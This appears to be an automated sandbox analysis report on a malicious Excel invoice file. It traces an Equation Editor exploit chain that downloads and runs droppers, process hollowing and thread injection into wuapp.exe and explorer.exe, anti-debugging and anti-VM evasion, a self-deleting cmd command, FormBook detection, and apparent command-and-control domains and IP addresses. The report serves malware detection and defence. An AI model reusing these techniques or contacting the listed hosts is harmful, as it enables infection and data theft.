Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: DL03327INV.xlsx	Virustotal: Detection: 38%
Source: DL03327INV.xlsx	ReversingLabs: Detection: 26%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\wuapp.exe C:\Windows\SysWOW64\wuapp.exe
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\Public\vbc.exe

4_2_00403646

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$DL03327INV.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR6B01.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@11/16@5/5

Source: C:\Users\Public\vbc.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00404ABB GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_00404ABB

Source: explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: C:\zjary\jjvucn\mxni\b98fa234680046ddacdf27145f9ff7b1\qjcbwv\ygyntjah\Release\ygyntjah.pdb source: vbc.exe, 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp, yldnat.exe, 00000005.00000000.976220140.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, yldnat.exe, 00000006.00000000.982290199.00000000013BE000.00000002.00000001.01000000.00000005.sdmp, wuapp.exe, 00000008.00000002.1176125071.0000000002397000.00000004.10000000.00040000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175572763.0000000000352000.00000004.00000020.00020000.00000000.sdmp, nss8A2D.tmp.4.dr, yldnat.exe.4.dr
Source:	Binary string: wntdll.pdb source: yldnat.exe, yldnat.exe, 00000006.00000003.985070971.00000000006C0000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032618043.00000000009D0000.00000040.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000003.983271572.0000000000560000.00000004.00000800.00020000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032385673.0000000000850000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, wuapp.exe, 00000008.00000003.1032134115.0000000000780000.00000004.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175742955.0000000001E90000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000002.1175921231.0000000002010000.00000040.00000800.00020000.00000000.sdmp, wuapp.exe, 00000008.00000003.1033412733.0000000001D00000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wuapp.pdb source: yldnat.exe, 00000006.00000002.1031989955.0000000000030000.00000040.10000000.00040000.00000000.sdmp, yldnat.exe, 00000006.00000002.1032320172.0000000000484000.00000004.00000020.00020000.00000000.sdmp

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B2445 push ecx; ret	5_2_013B2458
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E9FF push dword ptr [2E33947Ah]; ret	6_2_0041E9FB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041D5D5 push eax; ret	6_2_0041D628
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041D622 push eax; ret	6_2_0041D628
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041D62B push eax; ret	6_2_0041D692
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041D68C push eax; ret	6_2_0041D692
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E79A push dword ptr [2E33947Ah]; ret	6_2_0041E9FB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B2445 push ecx; ret	6_2_013B2458
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EADFA1 push ecx; ret	8_2_01EADFB4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012F1B1 push esi; retf	8_2_0012F1B2
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012D5D5 push eax; ret	8_2_0012D628
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012D622 push eax; ret	8_2_0012D628
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012D62B push eax; ret	8_2_0012D692
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012D68C push eax; ret	8_2_0012D692
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E79A push dword ptr [2E33947Ah]; ret	8_2_0012E9FB
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E9FF push dword ptr [2E33947Ah]; ret	8_2_0012E9FB

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\yldnat.exe	Jump to dropped file

Contains functionality to download and launch executables

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D04FF URLDownloadToFileW,ShellExecuteW,ExitProcess,

2_2_036D04FF

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B1890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

5_2_013B1890

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	RDTSC instruction interceptor: First address: 0000000000408BB4 second address: 0000000000408BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	RDTSC instruction interceptor: First address: 0000000000408F3E second address: 0000000000408F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe	RDTSC instruction interceptor: First address: 0000000000118BB4 second address: 0000000000118BBA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wuapp.exe	RDTSC instruction interceptor: First address: 0000000000118F3E second address: 0000000000118F44 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1500

Thread sleep time: -300000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\wuapp.exe	Last function: Thread delayed

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 6_2_00408E70 rdtsc

6_2_00408E70

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D7A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004069A4 FindFirstFileW,FindClose,	4_2_004069A4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node
Source: C:\Users\Public\vbc.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	API call chain: ExitProcess graph end node

Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: EQNEDT32.EXE, 00000002.00000002.971587463.000000000069F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ??\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.995482654.0000000000964000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000
Source: explorer.exe, 00000007.00000000.1002709372.000000000037B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
Source: explorer.exe, 00000007.00000000.995370512.0000000004423000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0e
Source: explorer.exe, 00000007.00000000.995128220.000000000434F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
Source: explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B1D2C _memset,IsDebuggerPresent,

5_2_013B1D2C

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

5_2_013B558A

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B1D17 GetProcessHeap,

5_2_013B1D17

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 6_2_00408E70 rdtsc

6_2_00408E70

Enables debug privileges

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_036D0559 mov edx, dword ptr fs:[00000030h]	2_2_036D0559
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h]	5_2_001103F8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h]	5_2_0011061D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h]	5_2_001106F7
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h]	5_2_00110736
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h]	5_2_00110772
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008726F8 mov eax, dword ptr fs:[00000030h]	6_2_008726F8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB26F8 mov eax, dword ptr fs:[00000030h]	8_2_01EB26F8

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 6_2_0040A0E0 LdrLoadDll,

6_2_0040A0E0

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B439B SetUnhandledExceptionFilter,	5_2_013B439B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_013B43CC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B439B SetUnhandledExceptionFilter,	6_2_013B439B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_013B43CC

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 23.81.214.26 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.arjimni.com
Source: C:\Windows\explorer.exe	Domain query: www.tw-life.net
Source: C:\Windows\explorer.exe	Domain query: www.contractornurd.com
Source: C:\Windows\explorer.exe	Domain query: www.yiwanggkm.com
Source: C:\Windows\explorer.exe	Network Connect: 164.155.217.57 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.212 80	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: 8E0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Memory written: C:\Users\user\AppData\Local\Temp\yldnat.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Thread register set: target process: 1860			Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Thread register set: target process: 1860			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna	Jump to behavior
Source: C:\Windows\SysWOW64\wuapp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"	Jump to behavior

Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager<

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B3283 cpuid

5_2_013B3283

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe

Code function: 5_2_013B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_013B3EC8

Source: C:\Users\Public\vbc.exe

4_2_00403646

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
